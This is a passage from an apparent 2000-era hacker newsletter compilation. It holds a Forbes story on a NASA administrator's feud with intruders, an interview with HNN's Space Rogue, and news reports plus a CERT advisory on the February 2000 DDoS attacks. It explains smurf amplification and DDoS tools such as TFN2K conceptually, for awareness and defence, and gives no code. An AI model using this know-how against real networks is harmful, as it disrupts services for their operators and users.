Kevin Mitnick. When Hagis cracked the Greenpeace site last year, it posted a warning: "Phree Kevin Mitnick or we will club 600 baby seals." (Mitnick finished a five-year prison sentence last month.) Dyson sympathized with Hagis' anticommercial sentiment but thought it silly to make the point on a NASA site. In his digital diatribe, he said it wasn't "what real hacking is about" and dared them to attack a commercial site. Instead, Hagis attacked him, prying into Dyson's home page on the Web to rewrite his broadside to say: "You guys are elite" (deleting "lame"). Dyson restored his page, and the intruders revised his directory file names to read: "You will pay for your stupidity." Dyson retorted: "Can't you stand free speech?" Evidently not. The hackers retaliated by taking down the Internet firm that provided Dyson's access. They planted a "poison pill" that deleted everything on the network. The firm, Nyx, had to shut down for two weeks to fix it. Dyson surfed hacker chat rooms and e-mail lists, asking where he might find "u4ea" and "tr0ut." He didn't go to the police. "They have no freaking clue." Things quieted down, but he started buying guns, including a 9mm Intratec pistol, a .45, a shotgun and a .357 Magnum. In September 1997 Hagis hit Yahoo, and Dyson worried he would be next. Three months later his home and home-business phones were disconnected. The phone company said someone had ordered the cutoff; it wasn't Jay Dyson. Then u4ea and tr0ut struck again, breaking into the online account of Dyson's wife, Kathleen, at the California Institute of Technology. They left her a message: "All the Dyson family will pay for the mistakes of Big Jay." This frightened her. Kathleen began to cry for hours on end, and the couple bickered constantly over Dyson's relentless pursuit of the hackers. She ended up on disability, "due in no small part to the harassment," he claims. But he refused to end his digital jihad. In January 1998 tr0ut and u4ea cracked into a second Internet-access firm that Dyson uses, PacificNet. This time they sabotaged Dyson's home business site, Point-2-Point Presence, a Web design firm, deleting files. As Dyson took to the keyboard to make repairs, they brazenly messaged him "live," slipping back in through the access firm's Unix operating system. Dyson asked what they wanted. "Stand on one leg, hop up and down three times and say 'Hagisrules!'three times," they commanded. "Done," Dyson typed back. He was trying to keep the hackers online long enough for PacificNet to trace them. It did not work. The next day Dyson reported the incidents to NASA. He was ordered to ignore Hagis. "All I ever wanted was to work for NASA, and they tell me if I wanted to keep the job I love, I'd have to turn the other cheek,"Dyson fumes. He dropped the case at work, "but redoubled my efforts on my own time." Stephen Nesbitt, a director in NASA's Computer Crimes Division, says the feud isn't an agency concern and suggests Dyson should call the FBI. The only time the law intervened, Dyson says, was when FBI agents paid him a visit last August while investigating the hack of the New York Times Web site almost a year earlier. Somehow Dyson, in his surfing of hacker sites, had drawn their attention. They accused him of being "Sidekick Slappy," a member of Hacking for Girlies, the gang that took down the Times site. (Those who know Sidekick Slappy say this: Jay Dyson is no Sidekick Slappy.) Meanwhile, his marriage crumbled. Dyson's obsession alienated his wife, and in June 1998 they separated. "My wife wanted to run and hide, and I wanted to fight," Dyson says. They later divorced; she declines to talk about it. Feeling alone, Dyson started smoking and losing weight--more than 50 pounds in five months, 100 pounds eventually. Some NASA colleagues say he should have dropped it. "Jay kept kicking at this beehive, then wondering why he kept getting stung," says one. Then came an arrest in the NASA hack. In April 1998 the Royal Canadian Mounted Police in Sudbury, Ontario, arrested Jason Mewhiney, now 23, and charged him with 46 counts of criminal mischief, illegal entry and other charges. Mewhiney's hacker handle: tr0ut, police said. He pleaded guilty last month to 12 counts and now is serving six months in jail. Says Dyson: "He's fortunate the law got there first." Online, tr0ut was malicious. In jail, Jason Mewhiney is clean-cut and "very shy--until you put him in front of a computer," says Corporal Alain Chabot, one of the arresting officers. "Sometimes these kids are Einsteins in front of their screens, but drop them off downtown without a bus map, and they're helpless." Dyson's other nemesis, u4ea, is still at large. Word in the hacker underground is that u4ea is a mole, but an FBI spokeswoman denies it and says an investigation continues. Dyson believes he has traced u4ea's identity to that of a young man in the Washington area, but he isn't handing that information to the FBI. Dyson wants to exact his own revenge. "I have no intention of dragging u4ea to the authorities," he says, fingering his .45. "This is strictly between him and me. I will do whatever it takes to see this end come about." @HWA 114.0 HNN: Feb 8th; Space Rogue Profiled by Forbes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue An interesting question and answer session between Adam Penenberg of Forbes magazine and Space Rogue, editor of the Hacker News Network. Forbes http://www.forbes.com/columnists/penenberg/index.htm Adam Penenberg is a senior editor at Forbes magazine and a regular contributor to the Forbes Digital Tool. I first met Space Rogue, founder of Hacker News Network (HNN), at Defcon, the annual hacker/undercover agent convention held in Las Vegas. Sipping beer and sweating from the Nevada heat, we sat next to each other at a seminar on social engineering--how to trick people into passing you information. Afraid of potential legal ramifications, Defcon organizers had banned media from the event, but unlike Space Rogue, I wasn't sporting press credentials; I figured that would be like putting a big "kick me" sign on my butt. While a geek on stage tried to dupe a Microsoft tech support operator, a Wired News reporter was ejected from the hall. Then the bouncer turned on us. "You have to leave," he commanded Space Rogue, fingering his press pass. "You," he said, pointing at me, "can stay." "But I'm Space Rogue," said Space Rogue, turning his badge around to show the HNN sticker he had applied to the back. "From Hacker News? Sorry, man, you're cool," said the guard. Everyone in the hacking and computer security world knows Space Rogue. In 1998, while a member of the L0pht Heavy Industries, a hacker think tank based in Boston, he testified before the U.S. Senate on the state of government computer security. He is the publisher of Hacker News Network, a resource as dear to the cyber-cognescenti as Merriam-Webster's is to writers. Recently, Space Rogue, along with the rest of L0pht, joined @Stake, a newly formed Internet security company funded by the hot venture capital firm Battery Ventures. As for his real name, well, he won't tell me. But he did tell me a lot about hobnobbing with senators, cyber-terrorists, white hats, script kiddies and the reason Hacker News Network doesn't use the word "hacker." Q: How did you get into hacking? A: That's like asking someone how he learned to read. I suppose my first 'real' hacking experience was with an Osborne 1 and CPM, when I taught myself BASIC. This was back in 1984. Or maybe it was earlier than that, when I was a kid making homemade flashlights out of discarded batteries so I could read at night when I was supposed to be sleeping. After the Osborne I graduated to the Commodore 64. I remember the local computer store sold Elephant floppies for two dollars each. Then came a Mac SE with dual floppies and 1 megabyte of RAM for $2,000. I still have that machine and the original box it came in. Q: Why are the vast majority of hackers male? A: For the same reason most physicists and mathematicians are male. Most girls are taught early on that technology is not feminine, therefore taboo. Society is starting to change, opening itself up to new acceptable ideologies. Q: What exactly is L0pht? How did you come up with the name? A: The original location of L0pht Heavy Industries was in the loft of an old warehouse in South Boston, where we stored unused equipment, stuff like a Vax 11/780 that was too big to put in your house. The Heavy Industries part came from a Japanese anime film. Somewhere in the movie was company with a name like Matsasumo Heavy Industries. We wondered, What the hell is a 'Heavy Industry'? But we thought it was cool so it stuck. Q: What was it like to testify before Congress in 1998? A: It was a great experience. Everyone we met, from the senators to the aides, were extremely nice, which we didn't expect. They even let us use our 'handles,' so the name 'Space Rogue' is permanently etched into our nation's historical record--which blows me away when I think about it. We got copies of the testimony from the government printing office, and it's pretty amazing to see Space Rogue, Senator Thompson and Senator Glenn all on the same page. Getting reimbursed for travel presented a problem as the accounting office couldn't very well make out a check to 'Space Rogue,' so Senator Thompson's office arranged it so we could get reimbursed in cash. Q: Why did you start the Hacker News Network? A: HNN started as a competition among a small group of friends to see who could distribute hacker-related news the fastest. Well, it wasn't really a competition, but I guess I won anyway. We hope that HNN is providing a service to the community, this is why it was originally started. In the beginning we were trying to make money on the site, so we carried advertising. This sort of went against the old-school hacker mentality, but we weren't trying to get rich; we just wanted to make the site self-sustaining. Since L0pht's merger with @Stake, we will be removing thoseads completely over time. It is important for @Stake to remain completely vendor-neutral, and advertising doesn't allow us to do that. Q: What is @Stake and why is it unique among Internet security consultancies? What is your relationship to @Stake? A: I am an employee of @Stake--actually I think my business cards say 'Research Scientist,' and yes, they also say Space Rogue. I honestly think @Stake is really going to shake up the industry; I mean look at what L0pht has been able to accomplish. Everything the eight of us did was basically as a part-time endeavor with no funds. Take L0pht to the next level--full-time staff, corporate muscle, some new technology--and what do you get? You get @Stake. Q: What is the greatest misperception about hackers? A: The general public seems to think that hackers equal criminals. I suppose depending on your definition of the word that may be true, although it is definitely not my definition. Because there are so many definitions of the word, HNN has stopped using the words hacker and cracker altogether, because it does not matter in what context I use the word, someone will send me mail and tell me its wrong. This is kind of ironic, since this is supposed to be the 'Hacker' News Network. Q: What is a 'white hat' hacker, and what is a 'script kiddie? A: Again the definitions vary, but in general a white hat hacker is someone who uses hacking methodologies and techniques but doesn't break the law. A 'script kiddie' is an old word in the underground that is just now becoming popular in the mainstream media. It describes someone who uses prewritten scripts to exploit security vulnerabilities, instead of coding his own--like an armed robber who knows nothing of ballistics or expanding gas theory, but knows how to pull a trigger. Q: Why should companies hire hackers? How could they ever trust them? A: Companies already hire hackers, they just don't know it. I mean, there is no national hacker registry to check on someone's hacker status. Any company that comes out and says 'We do not hire hackers' is deluding itself. We have to work somewhere, and more often than not we work at jobs that have cool technology. Of course, criminals should not be trusted or hired. But hackers, according to my definition, should be hired by every company. Any employee who has an innate curiosity about the systems he, or she, is working with, and who will not sleep until problems are solved, would benefit any business. Q: Is cyber-terrorism a real threat, or is it all hype? A: When we testified before Congress about being able to disable the Internet, a lot of people thought we were joking. Afterwards we received a lot of e-mail asking, "Hey, is this how it's done?'" We were like, well, that's not the method we thought of, but yeah that'd work. Of course, we have no motivation to take down the Internet; it's where we live and play and earn a living, so why would we destroy it? That said, governments are definitely hyping the threat of cyber-terrorism. While a threat does exist, I don't think it's as bad as some officials would lead you to believe. The scary part is governments are jockeying for position in the next 'cyberwar.' Over the last couple of years nations have been beefing up their cyber defenses. Defense is good; I have no problem with defense. But countries seem to be preparing offensive cyber capabilities. Offense often begets defense, so the escalation begins. And what happens when military offensive capabilities start to trickle down into the private sector? Now that is a scary thought. @HWA 115.0 HNN: Feb 9th: Yahoo, Buy.com, Amazon, E-Bay, CNN, UUNet, Who's Next? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue The Day the Internet Melted Monday's Denial of Service attack on Yahoo was repeated yesterday afternoon at Buy.com and quickly followed by attacks on Amazon, E-Bay, CNN and possibly even UUNet. Most of the sites where able to block the attack and where back online within an hour or two. The San Francisico office of the FBI has opened an investigation into the attack on Yahoo however it is unknown how far the investigation has gotten at this point. Some of the effected companies have also started their own investigations into how this has happened. A source close to one of the effected companies has told HNN that they have been able to trace the attack back to one end node where they found a list of up to ten thousand possibly compromised systems. E-Bay System Status http://www2.ebay.com/aw/announce.shtml ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2434923,00.html?chkpt=zdhpnews01 CNNfn http://cnnfn.com/2000/02/08/technology/yahoo/ CBS http://cbs.marketwatch.com/archive/20000208/news/current/buyx_attack.htx?source=htx/http2_mw C|Net http://news.cnet.com/news/0-1007-201-1545383-0.html?tag=st.ne.1002.tgif?st.ne.fd.gif.d Bloomberg http://quote.bloomberg.com/fgcgi.cgi?ptitle=Top%20Financial%20News&s1=blk&tp=ad_topright_topfin&T=markets_bfgcgi_content99.ht&s2=blk&bt=blk&s=d71082934889b6a780eecbacbb10e177 CNN http://cnn.com/2000/TECH/computing/02/09/cyber.attacks.01/index.html Wired http://www.wired.com/news/business/0,1367,34203,00.html Wired http://www.wired.com/news/business/0,1367,34221,00.html Associated Press - via Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500165399-500209859-500970793-0,00.html Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/20000209/bs/tech_hackers_2.html Distributed Denial of Service attacks, DDoS Distributed Denial of Service attacks aren't new, they have been around for a while. The basic premise is to use a larger number of systems to request information from a single server, similar to a radio call in contest where potential contestants get busy signals. Seldom is data lost or access inside the targeted systems gained, however visitors to the site are prevented from accessing data. The large number of systems used to launch the attack can easily be controlled by one person. The CERT Coordination center held a workshop concerning this type of attack back at the beginning of November. Results of Distributed-Systems Intruder Tools Workshop http://www.cert.org/reports/dsit_workshop.pdf CERT has also released a couple of advisories warning system administrators about the dangers of this kind of attack. CERT Advisory CA-99-17 Denial-of-Service Tools http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html CERT Advisory CA-2000-01 Denial-of-Service Developments http://www.cert.org/advisories/CA-2000-01.html CNN: More sites hacked in wake of Yahoo! eBay, Buy.com, CNN.com and Amazon come under attack; FBI probes Yahoo! incident By Staff Writer David Kleinbard February 08, 2000: 8:19 p.m. ET NEW YORK (CNNfn) - The Internet was reeling Tuesday night as attacks by hackers on a number of high-profile Web sites continued. In the early evening Tuesday, CNN.com confirmed that it was the latest site to suffer. "At 7 p.m. EST, we were attacked by hackers. A denial of service attack occurred until 8:45 p.m. We were seriously affected. We were serving content but it was very inconsistent and very little," Edna Johnson, director of public relations for CNN Interactive, said in a statement. "By 8:45 p.m., our upstream providers had put blocks in place that are shielding us and we are now serving content." CNN.com and CNNfn.com are both owned by Time-Warner Inc. (TWX: Research, Estimates). The leading auction Web site eBay and the Internet-based discount retailer Buy.com were crippled Tuesday by outside attacks. And online retailing giant Amazon also came under siege late Tuesday. Amazon.com Inc.'s (AMZN: Research, Estimates) Web site was virtually shut down Tuesday with problems that appeared similar to the failures that have hit other popular Web sites in recent days. Amazon said in a statement that its site was inaccessible for more than one hour late Tuesday because a "large amount of junk traffic" was aimed at the company's computers, tying them up and preventing nearly all its customers from making purchases. FBI investigates Yahoo! attack The incidents on Tuesday at Buy.com (BUYX: Research, Estimates) and eBay Inc.(EBAY: Research, Estimates). came one day after a hacker onslaught knocked Yahoo!'s heavily trafficked web site out of service for about three hours. Yahoo! (YHOO: Research, Estimates) said that it is cooperating with the FBI and other law enforcement agencies in an investigation of who perpetrated the cyber attack. Tuesday's attack, which hit Buy.com around 11 a.m., came on the same day that the company did its initial public offering. The Aliso Viejo, Calif.-based seller of books, computer hardware, software, videos, and other items sold 14 million shares at $13 each, raising $182 million. Buy.com's stock finished the day at 25 1/8, up 93 percent, despite the incident. "Around 11 a.m., we got hammered, and as a result had some difficulty getting the site back up," Buy.com's CEO, Gregory Hawkins, said in a televised interview with CNNfn. Hawkins said Buy.com is working with the company that hosts its web sites, Exodus Communications Inc., to determine how the attack occurred. Hawkins said that Buy.com appears to be the victim of the same type of cyber attack that crippled Yahoo! Inc.'s web site for about three hours on Monday. Yahoo!, the Internet portal based in Santa Clara, Calif. that is the world's most heavily trafficked web site, was shut down by what web security experts call a "denial of service attack." In that form of assault, a company's web servers are hit with such a large number of bogus requests that they cannot provide information to the site's legitimate users. It's like flooding a road with so many cars that other vehicles can't get through. eBay, a San Jose Calif.-based site where individuals buy and sell millions of diverse items each day, placed a notice on its site around 3:20 p.m. Pacific Standard Time that it had come under what appeared to be a denial of service attack generated by outside sources. "The attack appears to be affecting only the site's static pages, not its bidding, listing, and search functions," said eBay spokeswoman Kristin Seuell. "However, we have heard reports from the East Coast that people are having difficulty accessing the site." Static pages are those containing information that remains the same at all times. Internet security experts predicted on Tuesday that other commercial web sites will be hit by denial of service attacks in the future, even before they knew about the Buy.com incident. "There hasn't been a global solution yet to this problem," said Chris Rouland, director of the security research team at Internet Security Systems (ISSX: Research, Estimates) in Atlanta, Georgia, a major security software and consulting company. "If hackers can shut down Yahoo!, they can shut down anything they want tomorrow." Security experts were surprised that Yahoo! could be crippled by outsiders because the company's site has a reputation for having a high level of security and reliability. In fact, Tuesday's incident was Yahoo!'s first significant service interruption. "The Yahoo! web site is normally among the fastest and most reliable on the Internet," said Gene Shklar, vice president of public services at Keynote Systems Inc., (KEYN: Research, Estimates) a San Mateo, Calif. company that measures the performance and reliability of e-commerce web sites. "Yahoo! consistently delivers its home page during business hours in an average of 1.5 seconds to T-1 connected locations around the U.S. with a reliability of 99.3 percent or better." Keynote's stock soared 17 1/16 to 113 9/16 Tuesday, apparently in response to the media attention from Yahoo!'s service interruption. Yahoo!'s stock rose 19 1/8 to 373 1/8, as investors and analysts seemed pleased by the speed with which Yahoo! was able to recover from the attack. Lise Buyer, an analyst at CS First Boston, said in a research report Tuesday that the incident should have no impact on Yahoo!'s bottom line. "Given unused capacity and rapidly increasing pageviews, we expect the company will have no trouble making good on any advertising impression commitments. Therefore, we expect no impact on the company's operating statistics," Buyer said. Yahoo! said Tuesday that it has been contacted by law enforcement agencies, including the FBI, that are investigating the incident. "We are doing our part to work with the authorities by gathering the electronic tracers and data available," a Yahoo! spokeswoman said. "We will be sitting down with them over the next few days to discuss the appropriate next steps. The FBI is one group we anticipate meeting with." Yahoo! has dense layers of encryption that protect the databases on its site. Yahoo!'s customer information and site data weren't compromised by the attack, a company spokeswoman said Monday. Yahoo! said that the bogus requests came from up to 50 different Internet addresses at rates of up to a gigabyte per second, which is considered to be an enormous amount of web traffic over a short period of time. The history of the problem Denial of service attacks aren't new. In fact, both the FBI and CERT issued public warnings about them last year. CERT is part of the Software Engineering Institute, a federally funded research and development center at Carnegie Mellon University. Just a few hours before the attack on Yahoo! began, denial of service attacks were discussed at a meeting of the North American Network Operators' Group, one of the main organizations for the supervisors of computer networks. "Denial of service attacks occur periodically, but they are not as common as people trying to hack into a site, since hacking in enables you to alter the site's content and post something for everyone to see," Keynote's Shklar said. Internet Security Systems' Rouland said that there are four popular denial of service attacks, called Tribal Flood Network, Trinoo, TFN2K, and Stacheldraht. Hackers plan the attack in two stages. First, they surreptitiously place software "agents" on a network of computers that may have no connection to their actual target. Once these agents are in place, the hackers can direct all of the bandwidth capacity of that network at a target web site. "A master command wakes up the agents, identifies the target, and says go for it," Rouland said. Because these agents are installed using a backdoor method, they can be difficult to find, he said. Software that can trigger a denial of service attack is commonly traded by hackers over the Internet, said Scott Gordon, director of intrusion detection products at Axent Technologies (AXNT: Research, Estimates) in Rockville, Md., another large Internet security firm. These programs include Ping of Death and SynFlood. "It's a safe bet that other significant sites will be hit by this type of attack," Gordon said. "It may be done for boasting rights or financial gain through data theft." The FBI and the Secret Service have joint responsibility for investigating computer crimes. Large cases are coordinated by the FBI's National Infrastructure Protection Center. Scott Charney, a principal at PricewaterhouseCoopers Investigations LLC in D.C., who used to run the Justice Department's computer crimes unit, said that it could be difficult to trace who originated the attack on Yahoo!. That's because hackers often direct their traffic through several different web sites before hitting their end target. "Sophisticated hackers don't attack in a straight line," Charney said. "They weave between sites. If one of these sites strips off the source information and throws it away, there can be a break in the chain for investigators." "Global connectivity, lots of open sites, poor security at some, and lack of tracing ability create an environment where if you are up to no good, you can flourish," Charney said. -- Reuters and the Associated Press contributed to this report -=- Wired #1 Was Yahoo Smurfed or Trinooed? by Declan McCullagh 1:10 p.m. 8.Feb.2000 PST Yahoo's agonizing three-hour crash was the most devastating reported attack of its kind in the history of the Net, but it won't be the last. Company officials said as-yet-unknown miscreants laid siege to the Internet's second most popular destination at about 10:30 a.m. PST Monday, snarling Yahoo's internal network and denying millions of visitors access to mail, schedules, and the directory service. What's particularly disturbing: There may not have been anything Yahoo could have done to prevent it. Any Web site is vulnerable to so-called denial of service (DoS)attacks, which have grown considerably more fearsome recently. Although their methods vary, all attempt to clog the networks of the company that's being targeted, sometimes with devastating effect. "What we're seeing is adolescent pranks going mainstream," says MIT network manager Jeff Schiller. "This is the electronic equivalent. It just has much more far-reaching impact." DoS attacks are a particular favorite of malcontents, since they can be done somewhat anonymously and since they require little technical skill. Some, like "smurfing" and "fragging," are named after the software that conducts the exploit. They've long been used to cripple Internet Relay Chat and other low-profile sites -- Wired News reported on one incident in January 1998. But they can also be used to assail even some of the best-defended corporations, something that's not exactly heartening to the millions of people who now rely on the Web for calendars, scheduling, and email. One popular attack is called "smurfing." It works this way: A perpetrator sends a stream of "echo" response-requests and pretends they're coming from the victim's computer. The multipled replies overwhelm the targeted network. They also cause havoc inside the broadcasting (aka smurf amplifying) computers that were used as unwitting reflectors. Depending on the size of the intermediate network, a clever attacker can easily increase the muscle of his assault. A 768 Kb/s stream of echo packets multipled by a broadcast network with 100 machines can generate a 76.8 Mb/s flood directed against the target -- more than enough to overwhelm any single computer. The good news is that defenses against this kind of assault are well-known. Computers can be modified to ignore echo requests. Cisco and 3Com have both released instructions to turn off broadcasting of them, and Internet Engineering Task Force RFC2644 says echo requests "must" be disabled in routers by default. Since "smurf" attacks became well-known in 1997, their threat seems to have decreased. One report says, "We have seen a reduction in average bandwidth used on a smurf attack from 80 Mbps to 5 Mbps. Additionally, there has been a [50 percent] reduction in the number of noticeable smurf attacks." But others have evolved to take their place. A December 1999 advisory from Carnegie Mellon University's Computer Emergency Response Team describes trinoo and Tribe Flood Network (TFN) -- two programs that perform the kind of distributed denial of service attacks Yahoo said it experienced on Monday. The design is astonishingly clever and simple. The idea: Instead of a single site launching an echo-packet-augmented attack, a large network can assault a target in a coordinated and much more destructive manner. Both trinoo and TFN rely on a master "handler" computer that signals a network of slave "agent" machines when it's time to start an attack. The human perpetrator must have already installed the trinoo or TFN daemons on the dozens -- or even hundreds -- of machines that will participate. The remedy is simple, as long as everyone does it: Besides the long-standing defenses against "smurf" attacks, system administrators should look for hidden copies of trinoo or TFN binaries squirreled away that might attack a remote site like Yahoo when called into action. Even newer programs have emerged that have in part replaced TFN, which seemed to have peaked in popularity around September 1999. Some of the more recent ones include stacheldraht -- German for "barbed wire" -- and an upgraded TFN2000. The threat prompted CERT to release an advisory last month. Stacheldraht agents have been spotted on Solaris machines, and a version appears to be available for Linux as well. One big difference -- or improvement, if you're the person using it -- is that stacheldraht uses encrypted communications to cloak its intentions from administrators who might be monitoring the network. In response, the federal government has become more involved. An alphabet soup of agencies, including the FBI's National Infrastructure Protection Center, the Critical Infrastructure Assurance Office, and FedCIRC are asking Congress for money and promising to defend the Net. But companies that have invented the technology that runs the Net don't seem to need help in fixing problems with it. A Yahoo source close to the problem told Wired News that they hadn't contacted the Feds during their trouble yesterday because it would do no good. Some measures the government is contemplating -- like increased surveillance of the Internet to snare wayward hackers -- alarms civil libertarians. The Electronic Privacy Information Center recently released documents it obtained that talk of increased electronic monitoring of Americans. "We have Feds that are overreacting to this," says MIT's Schiller, a member of the IETF steering committee. What needs to happen is for outdated rules to be repealed, he said. "There needs to be a way network operators can [work together] in a way that's immune from Sherman antitrust," he said. "We had a situation at IETF where we couldn't have two people in the same room together by themselves since they were representatives of big competitors." President Clinton's budget released Monday calls for sharply increased spending on computer security. -=- Wired #2 Yahoo on Trail of Site Hackers Reuters 3:50 p.m. 8.Feb.2000 PST SAN FRANCISCO -- Yahoo said Tuesday it was meeting with the FBI to track down hackers who brought its site to a standstill Monday, although the company expects no financial impact from the incident. "From a financial standpoint, there isn't any impact," said a Yahoo spokeswoman. The company's stock surged 19-1/8 to 373-1/8 along with a generally stronger Nasdaq market led by the Internet sector, as investors ignored the technical problem at the site. Yahoo (YHOO), which generates much of its revenue through advertising, was able to reschedule its ad spots to other positions without a significant loss of revenue, the company said. But since an estimated 100 million pages would have been viewed during the two hours the site was down, the company could potentially have lost as much as $500,000, analysts said. "We were contacted by the authorities regarding the situation that occurred yesterday and we are doing our part to work with them," said the Yahoo spokeswoman. The company is gathering electronic data and attempting to trace the source of the flood of messages that swamped its site and led to its virtual shutdown. Yahoo declined to identify all of the authorities who were involved in the probe, but said specifically that the FBI was included. "We will be sitting down with them over the next few days to discuss the appropriate next steps," the company said. The attack has been narrowed to 50 Internet addresses, though computer security experts said it would take time to track any hacker or hackers sophisticated enough to have shut down Yahoo, one of the largest Internet sites. The attack is called a distributed denial of service attack, which is a concerted move to inundate a Web site from many points. The attackers disguise their identities by going though a series of networks and using other computers to do damage. Since computer programs are used, a single person could have launched the attack, even though it appears to be coming from many directions. "The FBI may be able to do some back-tracking and coordination to find out who did this," said Scott Gordon, director of intrusion protection at Axent Technologies (AXNT), of Rockville, Maryland. But investigators need to go behind the target computers to find the command center that directed the attack and, "we're not going to get an answer in the very near future," Gordon said. Investigators noted that computer security services have been warning for some time about attacks like the one launched on Yahoo. The protection, in such cases, is to find the source of the problem and put a block on the Internet address from entering the site. The blocker, known as a "rate filter" is aimed at putting a halt to the "mock traffic" that is jamming the target site. Yahoo installed that protection soon after the attack was launched and restored normal service by early afternoon. Service was normal on the site Tuesday, a spokeswoman said. Copyright © 1999-2000 Reuters Limited. -=- CERT: CERT® Advisory CA-99-17 Denial-of-Service Tools Original release date: December 28, 1999, 15:00 EST (GMT -0500) Last Updated: December 28, 1999, 20:00 EST (GMT -0500) Source: CERT/CC A complete revision history is at the end of this file. Systems Affected All systems connected to the Internet can be affected by denial-of-service attacks. Tools that run on a variety of UNIX and UNIX-like systems and Windows NT systems have recently been released to facilitate denial-of-service attacks. Additionally, some MacOS systems can be used as traffic amplifiers to conduct a denial-of-service attack. I. Description New Distributed Denial-of-Service Tools Recently, new techniques for executing denial-of-service attacks have been made public. A tool similar to Tribe FloodNet (TFN), called Tribe FloodNet 2K (TFN2K) was released. Tribe FloodNet is described in http://www.cert.org/incident_notes/IN-99-07.html#tfn. Like TFN, TFN2K is designed to launch coordinated denial-of-service attacks from many sources against one or more targets simultaneously. It includes features designed specifically to make TFN2K traffic difficult to recognize and filter, to remotely execute commands, to obfuscate the true source of the traffic, to transport TFN2K traffic over multiple transport protocols including UDP, TCP, and ICMP, and features to confuse attempts to locate other nodes in a TFN2K network by sending "decoy" packets. TFN2K is designed to work on various UNIX and UNIX-like systems and Windows NT. TFN2K obfuscates the true source of attacks by spoofing IP addresses. In networks that employ ingress filtering as described in [1], TFN2K can forge packets that appear to come from neighboring machines. Like TFN, TFN2K can flood networks by sending large amounts of data to the victim machine. Unlike TFN, TFN2K includes attacks designed to crash or introduce instabilities in systems by sending malformed or invalid packets. Some attacks like this are described in http://www.cert.org/advisories/CA-98-13-tcp-denial-of-service.html http://www.cert.org/advisories/CA-97.28.Teardrop_Land.html Also like TFN, TFN2K uses a client-server architecture in which a single client, under the control of an attacker, issues commands simultaneously to a set of TFN2K servers. The servers then conduct the denial-of-service attacks against the victim(s). Installing the server requires that an intruder first compromise a machine by different means. Asymmetric traffic from MacOS 9 MacOS 9 can be abused by an intruder to generate a large volume of traffic directed at a victim in response to a small amount of traffic produced by an intruder. This allows an intruder to use MacOS 9 as a "traffic amplifier," and flood victims with traffic. According to [3], an intruder can use this asymmetry to "amplify" traffic by a factor of approximately 37.5, thus enabling an intruder with limited bandwidth to flood a much larger connection. This is similar in effect and structure to a "smurf" attack, described in http://www.cert.org/advisories/CA-98.01.smurf.html Unlike a smurf attack, however, it is not necessary to use a directed broadcast to achieve traffic amplification. II. Impact Intruders can flood networks with overwhelming amounts of traffic or cause machines to crash or otherwise become unstable. III. Solution The problem of distributed denial-of-service attacks is discussed at length in [2], available at http://www.cert.org/reports/dsit_workshop.pdf Managers, system administrators, Internet Service Providers (ISPs) and Computer Security Incident Response Teams (CSIRTs) are encouraged to read this document to gain a broader understanding of the problem. For the ultimate victim of distributed denial-of-service attacks Preparation is crucial. The victim of a distributed denial-of-service attack has little recourse using currently available technology to respond to an attack in progress. According to [2]: The impact upon your site and operations is dictated by the (in)security of other sites and the ability of of a remote attackers to implant the tools and subsequently to control and direct multiple systems worldwide to launch an attack. Sites are strongly encouraged to develop the relationships and capabilities described in [2] before you are a victim of a distributed denial-of-service attack. For all Internet Sites System and network administrators are strongly encouraged to follow the guidelines listed in [2]. In addition, sites are encouraged to implement ingress filtering as described in [1]. CERT/CC recommends implementing such filtering on as many routers as practical. This method is not foolproof, as mentioned in [1]: While the filtering method discussed in this document does absolutely nothing to protect against flooding attacks which originate from valid prefixes (IP addresses), it will prohibit an attacker within the originating network from launching an attack of this nature using forged source addresses that do not conform to ingress filtering rules. Because TFN2K implements features designed specifically to take advantage of the granularity of ingress filtering rules, the method described in [1] means that sites may only be able to determine the network or subnet from which an attack originated. Sites using manageable hubs or switches that can track which IP addresses have been seen at a particular port or which can restrict which MAC addresses can be used on a particular port may be able to further identify which machine(s) is responsible for TFN2K traffic. For further information, consult the documentation for your particular hub or switch. The widespread use of this type of filtering can significantly reduce the ability of intruders to use spoofed packets to compromise or disrupt systems. Preventing your site from being used by intruders TFN2K and similar tools rely on the ability of intruders to install the client. Preventing your system from being used to install the client will help prevent intruders from using your systems to launch denial-of-service attacks (in addition to whatever damage they may cause to your systems). Popular recent attacks can be found at http://www.cert.org/current/current_activity.html Sites are encouraged to regularly visit this page and address any issues found there. For the "Mac Attack" Apple has developed a patch, as described in Appendix A. Please see the information there. Appendix A contains information provided by vendors for this advisory. We will update the appendix as we receive or develop more information. If you do not see your vendor's name in Appendix A, the CERT/CC did not hear from that vendor. Please contact your vendor directly. Appendix A. Vendor Information Apple Computer OT Tuner 1.0 switches off an option in Open Transport that would cause a Macintosh to respond to certain small network packets with a large Internet Control Message Protocol (ICMP) packet. This update prevents Macintosh computers from being the cause of certain types of Denial of Service (DOS) issues. The update is available from our software update server at http://asu.info.apple.com/swupdates.nsf/artnum/n11559 In addition, it will soon be available via the automatic update feature that is part of Mac OS 9. References [1] RFC2267, Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing , P. Ferguson, D. Senie, The Internet Society, January, 1998, available at http://info.internet.isi.edu:80/in-notes/rfc/files/rfc2267.txt [2] Results of the Distributed-Systems Intruder Tools Workshop, The CERT Coordination Center, December, 1999, available at http://www.cert.org/reports/dsit_workshop.pdf [3] The "Mac Attack," a Scheme for Blocking Internet Connections, John A. Copeland, December, 1999, available at http://www.csc.gatech.edu/~copeland. Temporary alternate URL: http://people.atl.mediaone.net/jacopeland The CERT Coordination Center thanks Jeff Schiller of the Massachusetts Institute of Technology, Professor John Copeland and Jim Hendricks of the Georgia Institute of Technology, Jim Ellis of Sun Microsystems, Wietse Venema of IBM, Rick Forno of Network Solutions, Inc., Dave Dittrich of the University of Washington, Steve Bellovin of AT&T, Jim Duncan and John Bashinski of Cisco Systems, and MacInTouch for input and technical assistance used in the construction of this advisory. This document is available from: http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT® Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 